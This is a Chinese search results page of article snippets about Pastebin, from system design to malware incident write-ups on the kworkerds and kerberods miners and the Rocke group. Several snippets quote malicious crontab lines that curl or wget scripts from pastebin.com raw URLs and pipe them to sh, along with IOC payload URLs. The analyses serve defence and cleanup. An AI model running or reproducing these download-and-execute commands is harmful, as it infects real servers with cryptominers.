首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

系统设计面试:如何设计一个 Pastebin

,可以访问 pastebin.com 来试用。...1.为什么需要 pastebin ?...一开始,pastebin 主要用来分享代码,程序员写完代码后想给别人看,直接把代码粘贴至 pastebin,然后把 url 发给其他人,其他人点开链接就可以直接看到代码,代码的缩进格式会保持不变,代码评审人员看起来会比较舒服...实际上,任何纯属文本数据都可以通过 pastebin 来共享,比如以下应用场景: 用做一个在线的纯文本文档。 突破限制,发一些长推文。...pastebin 的初衷是对用户友好的,无需注册或者登陆即可使用,而且可以分享超长文本,让用户分享文本变得更容易,目前 pastebin 每月有 1700 万活跃用户。

94310
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    kworkerds 挖矿木马简单分析及清理

    crontab 被写入了一个定时任务,每半小时左右会从 pastebin 上下载脚本并且执行。 原因 redis 没有启用密码认证。 清理方案 将 redis 服务关闭,并设置密码。...# 防止木马再次下载 echo '127.0.0.1 pastebin.com' >> /etc/hosts # 删除掉局域网服务器之间的免密登录 # 本机定时任务和木马都清理干净了,重启后木马又重新执行...rm -rf ~/.ssh # 先 kill 掉木马进程,不然服务器操作起来极慢 ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill...function echocron() { echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP ||...root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|

    1.5K31

    如何将Pastebin上的信息应用于安全分析和威胁情报领域

    FreeBuf百科 Pastebin是一个便签类站点,用户可以在该平台任意储存纯文本,例如代码,文字等内容。Pastebin支持的编程语言种类也非常齐全,还会自动判断语言类型并高亮显示代码内容。...但从安全分析和威胁情报的角度来看,Pastebin却是一个信息收集的宝库。特别是那些上传到pastebin却未明确设置为private(需要一个账户)的内容,将会被所有人公开查阅。...我们可以检索pastebin上所有被上传的数据,并筛选出我们感兴趣的数据。这里我要向大家推荐使用一款叫做dumpmon的推特机器人,它监控着众多“贴码网站”的账户转储、配置文件和其他信息。...值得一提的是, Pastebin虽未禁止我们爬取它的数据,但在IP方面却有一定限制,一旦触发IP锁将会被临时甚至永久封禁。 幸运的是,Pastebin为我们提供了一个专门为这种任务所设计的API。...这是一个简单的脚本和一组Yara规则,将从pastebin API获取粘贴,并将任何匹配的粘贴存储到具有漂亮的Kibana前端的elastic搜索引擎中。 ? ?

    1.8K90

    新加坡新保集团(SingHealth)网络攻击事件的可疑线索分析

    我们的 SpiderLabs 团队发现了在两个不同时间点上传的两篇单独的 Pastebin 帖子,该两篇Pastebin帖子包含的信息,是一些对新保集团的数据库访问操作,其中一篇帖子罗列了Java服务器相关的异常日志...以下是该篇 Pastebin 帖子中,请求日志涉及的其它完整语句参数: ? 经查询分析,目前该篇 Pastebin 帖子已经被上传者删除,可以点此( webcache)查看其谷歌快照。...最终,我们发现攻击者为了隐藏痕迹,已经删除了这篇数据库查询的 Pastebin 帖子,谷歌快照也不存在相关缓存内容,只在Pastebin上存有内容不可见的记录: ? ?...可以说,这种包含错误日志和查询的 Pastebin 帖子,很多时候可能是开发人员之间为了排除故障而进行的相互共享,所以,基于此种原因,我们不能确定到底是谁上传了这些内容到Pastebin,也不清楚其实际意图...,以进行故障排除; 第三种场景是,可能与攻击毫无关联,仅只是某位内部开发人员为了进行故障排除而上传到Pastebin的。

    95320

    Rocke黑客组织活动分析

    该组织有12步操作的特点,自Rocke首次报道以来,该风格保持一致: 1、攻击者将第一个有效负载上传到第三方站点(例如,Pastebin,GitHub) 2、引诱受害者导航到Pastebin / GitHub...样本还包含与已知Rocke报告的Pastebin URL的硬编码链接: hxxps://pastebin[.]com/raw/HWBVXK6H hxxps://pastebin[.]com/raw/60T3uCcb...hxxps://pastebin[.]com/raw/rPB8eDpu hxxps://pastebin[.]com/raw/wR3ETdbi hxxps://pastebin[.]com/raw/Va86JYqw...Rocke通信模式 研究人员试图确定是否可以使用NetFlow数据识别从Pastebin下载的初始有效负载。研究人员发现,共有50个组织与Pastebin建立了网络连接。...在这50个组织中,有8个组织在与Rocke域的连接的同一小时内与Pastebin建立了网络连接。

    1.4K10

    Redis未授权访问及安全组漏洞招致kerberods来挖矿

    个cpu信息,默认是4个 排错 排查发现crontab异常 [root@VM_3_114_centos ~]# crontab -l */15 * * * * (curl -fsSL https://pastebin.com.../raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 先简单解决问题 重命名curl wget yum等工具,然后停止cron...服务,删除crontab任务并禁锢cron任务中root文件,并修改host伪造pastebin.com解析,问题暂时得到了解决 然后分析问题 手工试了下这个脚本的威力,具体的也可以访问这个网站查看 https...://pastebin.com/raw/xmxHzu5P ,这里会***启动文件/usr/sbin/kerberods 后来网上查了下该病毒短时间内即造成大量 Linux 主机沦陷,它的传播方式分为三种...未授权访问和弱密码这两种常见的配置问题进行控制它们执行恶意命令 利用 SSH 弱密码进行爆破,然后控制它们执行恶意命令 [root@VM_3_114_centos tmp]# wgetold -q -O- https://pastebin.com

    56340
    领券